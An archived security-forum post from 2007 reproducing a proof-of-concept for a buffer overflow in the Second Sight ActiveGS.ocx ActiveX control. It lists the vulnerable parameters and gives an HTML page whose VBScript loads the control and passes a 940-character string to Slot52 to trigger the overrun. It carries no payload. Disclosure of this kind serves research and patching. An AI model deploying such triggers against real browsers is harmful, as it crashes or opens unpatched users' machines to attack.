邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2007-4-25 01:01

Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC

[code]<!--

===============================================================================================
            Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC
                      By Umesh Wanve
==============================================================================================  
   
Date : 24-04-2007

Tested on Windows 2000 SP4 Server English
      Windows 2000 SP4 Professional English
  
Reference: [url]http://www.securityfocus.com/bid/23554[/url]

Vendor: [url]http://www.freetoolsassociation.com[/url]
     [url]http://www.freetoolsassociation.com/fta/activegs/activegs.cab[/url]


Desc: Many parameters of CLSID 052DF14F-6F28-44A0-9130-294FDA6176EB are vulnerable. This activex gives error like,
   Buffer Overrun detected. This is complied with /GS flag. The all vulnerable parameters are
    Slot51,Slot52,Slot61,Slot62,Slot7,Slot71,Slot72.

PS. This was written for educational purpose. Use it at your own risk.Author will be not be
   responsible for any damage.

Always thanks to Metasploit and Stroke.

-->


<html>

<title>
Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC- By Umesh Wanve
</title>

<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:052DF14F-6F28-44A0-9130-294FDA6176EB" > </OBJECT>

<script language="vbscript">
targetFile = "C:\Research\activegs\ActiveGS.ocx"
prototype = "Invoke_Unknown Slot52 As String"
memberName = "Slot52"
progid   = "ActiveGSLib.ActiveGS"
argCount  = 1

arg1=String(940, "A")

target.Slot52 = arg1


</script>

</body>

</html>

[/code]

页: [1]
© 1999-2008 EvilOctal Security Team